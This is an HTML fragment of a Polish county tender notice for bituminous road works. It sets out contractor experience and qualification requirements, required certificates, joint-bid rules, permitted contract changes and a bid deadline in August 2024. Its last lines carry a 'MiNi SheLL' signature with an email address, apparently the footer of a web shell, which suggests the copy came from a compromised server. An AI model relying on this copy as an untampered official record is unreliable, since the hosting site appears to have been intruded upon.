Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Wykonawcy zobowiązani będą wykazać spełnienie warunku dotyczącego: 1) Zdolności technicznej lub zawodowej- na<br/>potwierdzenie spełniania warunku Wykonawcy ubiegający się o udzielenie zamówienia wykażą, że: a) zrealizowali w ciągu<br/>ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie<br/>minimum dwa zamówienia polegające na budowie, przebudowie, remoncie itp (z wyłączeniem remontów cząstkowych)<br/>drogi/ulicy nawierzchni bitumicznej o wartości brutto nie mniejszej dla jednego zamówienia niż 500 tys. zł. Przez wartość 1<br/>zamówienia Zamawiający rozumie łączną wartość zadania w ramach 1 umowy (1 zadania inwestycyjnego); b) dysponują<br/>osobą, która będzie uczestniczyć w realizacji zamówienia w szczególności pełniącą funkcje : Kierownika budowy/robót - co<br/>najmniej 1 osoba posiadająca uprawnienia do kierowania robotami budowlanymi w specjalności drogowej bez ograniczeń<br/>lub inne<br/>uprawnienia umożliwiające wykonywanie tych samych czynności, do wykonywania, których w aktualnym stanie prawnym<br/>uprawniają uprawnienia budowlane w tej specjalności ** oraz posiadać minimum 2-letnie doświadczenie zawodowe w<br/>kierowaniu tymi robotami i przynależącą do Izby Inżynierów Budownictwa; (** W rozumieniu przepisów Rozporządzenia<br/>Ministra Inwestycji i Rozwoju z dnia 29 kwietnia 2019 r. w sprawie przygotowania zawodowego do wykonywania<br/>samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2019 r. poz. 831)Dopuszcza się uprawnienia równoważne do<br/>powyższych wydane na podstawie wcześniej obowiązujących przepisów prawa.W przypadku obywateli<br/>państw Europejskiego Obszaru Gospodarczego oraz Konfederacji<br/>Szwajcarskiej muszą oni spełniać wymogi określone w art. 12a ustawy Prawo budowlane, z których wynika, że samodzielne<br/>funkcje techniczne w budownictwie mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały<br/>uznane na zasadach określonych w przepisach ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w<br/>państwach członkowskich Unii Europejskiej). Ocena spełniania warunku udziału w<br/>postępowaniu zostanie dokonana na podstawie dokumentów i oświadczeń złożonych przez wykonawcę, na zasadzie<br/>SPEŁNIA/NIE SPEŁNIA. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Po badaniu ofert pod kątem<br/>spełniania przesłanek odrzucenia oraz po wstępnej weryfikacji oświadczeń dotyczących spełniania warunków oraz braku podstaw do<br/>wykluczenia, Wykonawca, którego oferta zostanie najwyżej oceniona na wezwanie Zamawiającego zobowiązany będzie złożyć<br/>następujące dokumenty w terminie nie krótszym niż 5 dni od dnia wezwania: 1) Odpis lub informację z Krajowego Rejestru<br/>Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej w zakresie art.109 ust.1 pkt 4 ustawy Pzp.,<br/>sporządzonych nie wcześniej niż 3 miesiące przed jej<br/>złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji. 2) Zaświadczenie właściwego naczelnika urzędu<br/>skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków i opłat, w zakresie art. 109 ust.1 pkt 1 ustawy,<br/>wystawione nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem podatków lub opłat wraz z<br/>zaświadczeniem Zamawiający żąda złożenia dokumentów potwierdzających, że przed terminem składania ofert wykonawca dokonał<br/>płatności należnych podatków lub opłat wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych<br/>należności. 3) Zaświadczenie albo inny dokument właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych<br/>lub właściwej placówki terenowej Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z<br/>opłaceniem składek na ubezpieczenia społeczne i zdrowotne, zgodnie z art. 109 ust.1 pkt 1 ustawy,wystawione nie wcześniej niż 3<br/>miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem składek na ubezpieczenie społeczne lub zdrowotne wraz z<br/>zaświadczeniem albo innym dokumentem Zamawiający żąda złożenia dokumentów potwierdzających, że przed upływem terminu<br/>składania ofert wykonawca dokonał płatności należnych składek na ubezpieczenie społeczne lub zdrowotne wraz z odsetkami lub<br/>grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności. 4)oświadczenie wykonawcy, w zakresie art.108 ust.1<br/>pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 10.02.2007r. o ochronie konkurencji<br/>i konsumentów z innym wykonawcą,<br/>który złożył odrębna ofertę, albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub<br/>informacjami potwierdzającymi przygotowanie oferty, niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej -<br/>wzór stanowi Załącznik nr 5 do SWZ. 5)oświadczenie o aktualności informacji zawartych w oświadczeniu, o którym<br/>mowa w art. 125ust.1 ustawy w zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego, o których mowa<br/>w art. 109 ust.1 pkt 1 ustawy, odnośnie do naruszenia obowiązków<br/>dotyczących płatności podatków i opłat lokalnych, o których mowa w ustawie z dnia 12 stycznia 1991 r. o podatkach i opłatach<br/>lokalnych (Dz. U z 2022 r. poz. 1452) – wzór stanowi Załącznik nr 8 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a)wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia<br/>publicznego, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi wraz z informacjami na temat ich kwalifikacji<br/>zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu<br/>wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami - wzór stanowi Załącznik nr 7 do<br/>SWZ; b) wykaz robót budowlanych (min. 2 zamówienia) polegające na budowie, przebudowie lub remoncie itp. lub remoncie itp.<br/>(z wyłączeniem remontów cząstkowych) drogi/ulicy o nawierzchni bitumicznej, o wartości brutto nie mniejszej dla jednego<br/>zamówienia niż 500 tys. zł , wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy<br/>– w tym okresie, wraz z podaniem<br/>ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem<br/>dowodów określających czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje<br/>bądź inne dokumenty sporządzone przez podmiot , na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z<br/>przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty - wzór wykazu stanowi<br/>Załącznik nr 6 do SWZ.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia ustanawiają Pełnomocnika do reprezentowania<br/>ich w niniejszym postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego.<br/>Pełnomocnictwo powinno być załączone do oferty. 2. Wszelka korespondencja prowadzona będzie wyłącznie z<br/>Pełnomocnikiem. 3.Oświadczenia, o których mowa w rozdz. XII ppkt 1.4 i 1.5 SWZ, składa każdy z Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia. 4. W przypadku wspólnego ubiegania się dwóch<br/>lub więcej Wykonawców o udzielenie niniejszego zamówienia, o<br/>których mowa w art. 117 Pzp warunek udziału o którym mowa w rozdz. VII pkt. 2 SWZ jest spełniony jeżeli<br/>Wykonawca,ubiegający się o zamówienia wspólnie z innymi wykonawcami, i który dostarcza potencjał na potrzeby<br/>spełnienia warunku udziału w postępowaniu w zakresie wykształcenia,kwalifikacji zawodowych lub doświadczenia, ma<br/>obowiązek osobiście wykonać tę część zamówienia, dla której te zdolności są wymagane. 5. W przypadkach, o których<br/>mowa wyżej,Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie,z którego<br/>wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy. 6.Zamawiający w stosunku do<br/>Wykonawców ubiegających się o zamówienie, w odniesieniu do warunku dotyczącego zdolności technicznej lub zawodowej dopuszcza łączne spełnienie warunku przez Wykonawców. 7. Oświadczenia i dokumenty potwierdzające brak podstaw do<br/>wykluczenia z postępowania składa każdy z Wykonawców ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość dokonania zmian w umowie w następujących przypadkach:<br/>1.Termin wykonania umowy może ulec przesunięciu w przypadku opóźnień wynikających z: a)przestojów i opóźnień<br/>zawinionych przez Zamawiającego, b) wystąpienia warunków atmosferycznych uniemożliwiających wykonywanie robót –<br/>fakt ten musi zostać zgłoszony Zamawiającemu i zostać<br/>potwierdzony przez inspektora nadzoru , c) poleceń wydawanych przez<br/>Inspektora Nadzoru mających wpływ na termin wykonania, lecz niewynikających z uchybień Wykonawcy, d) wykopalisk<br/>uniemożliwiających prowadzenie robót, e)wystąpienia istotnego błędu w dokumentacji – termin umowny może zostać<br/>wydłużony o czas niezbędny na usuniecie<br/>wad w dokumentacji, f) konieczności uzyskania decyzji lub uzgodnień,mogących spowodować wstrzymanie robót z przyczyn<br/>niezależnych od wykonawcy, g)podpisania umowy na zamówienia<br/>dodatkowe, o ile wykonywanie tych zamówień wpływa na termin wykonania niniejszej umowy, h)wystąpienia siły wyższej<br/>(zgodnie z opisem w § 27 wzoru umowy stanowiącej Załącznik nr 9 do SWZ). 2. W uzasadnionych przypadkach, w ramach<br/>przedmiotowego zamówienia, dopuszcza<br/>się, za zgodą Zamawiającego, możliwość wykonania robót budowlanych w inny sposób niż określono to w dokumentacji (tj.<br/>wykonania tzw. robót zamiennych). Przedmiotowe zmiany muszą być korzystne dla Zamawiającego (zamiany na materiały,<br/>urządzenia, sprzęt posiadające co najmniej takie parametry techniczne, jakościowe i cechy użytkowe, jak te, które stanowiły<br/>podstawę wyboru oferty) i nie mogą prowadzić do zwiększenia wynagrodzenia Wykonawcy.<br/>Zmiana sposobu wykonania robót, o której mowa powyżej może być dokonana jedynie za zgodą Zamawiającego i może<br/>nastąpić w szczególności na skutek zmian technologicznych spowodowanych na przykład następującymi okolicznościami:<br/>(zgodnie z opisem w § 27 wzoru umowy stanowiącej Załącznik nr 9 do SWZ). 3. Zamawiający przewiduje dokonanie zmian<br/>wu<br/>mowie będących następstwem działania organów administracji,w szczególności: (zgodnie z opisem w § 27 wzoru umowy<br/>stanowiącej Załącznik nr 9 do SWZ). 4. Zamawiający przewiduje<br/>możliwość zmiany kierownika budowy i kierowników robót, przy czym osoby zastępujące muszą spełniać warunki określone<br/>w umowie. 5. W przypadku, gdy Wykonawca w ofercie nie przewidział korzystania z podwykonawców, przewiduje się<br/>możliwą zmianę umowy dotyczącą powierzenia przez Wykonawcę wykonywania części zamówienia podwykonawcom lub<br/>dalszym podwykonawcom, jeżeli Wykonawca uzna to za konieczne i złoży odpowiedni wniosek w formie pisemnej. 6. W<br/>przypadku, gdy Wykonawca w ofercie przewidział korzystanie z podwykonawców, przewiduje się możliwą zmianę umowy<br/>dotyczącą samodzielnego wykonania przedmiotu<br/>zamówienia lub zwiększenia bądź zmniejszenia liczby podwykonawców, jeżeli Wykonawca uzna to za konieczne i złoży<br/>odpowiedni wniosek w formie pisemnej, przy czym jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na<br/>którego zasoby Wykonawca powoływał się, na zasadach określonych w art. 118 ust. 1 ustawy Pzp, w celu wykazania<br/>spełniania warunków udziału w postępowaniu, Wykonawca jest obowiązany<br/>wykazać Zamawiającemu, iż proponowany inny podwykonawca lub Wykonawca samodzielnie spełnia je w stopniu nie<br/>mniejszym niż wymagany w<br/>trakcie postępowania o udzielenie zamówienia. 7. Zamawiający,<br/>jeżeli projekt dotyczący realizacji inwestycji w ramach któregokolwiek z zadań zostanie zakwalifikowany do dofinansowania,<br/>przewiduje również możliwość dokonania zmian postanowień umowy w stosunku do treści oferty w przypadkach,gdy:<br/>(zgodnie z opisem w § 27 wzoru umowy stanowiącej Załącznik nr 9 do SWZ). 8. Wysokość wynagrodzenia Wykonawcy<br/>może ulec zmianie w sytuacji: (zgodnie z opisem w § 27 wzoru umowy stanowiącej Załącznik nr 9 do SWZ). Szczegółowy<br/>opis rodzaju i zakresu zmian oraz warunki wprowadzenia zmian zawiera wzór umowy stanowiącej Załącznik nr 9 do SWZ). <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-08-30 10:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę z wymaganymi dokumentami należy złożyć za pośrednictwem Platformy zakupowej pod adresem https://zdp-powiatkrasnicki.ezamawiajacy.pl (zgodnie z instrukcją określoną w rozdziale XIII SWZ)</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-08-30 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com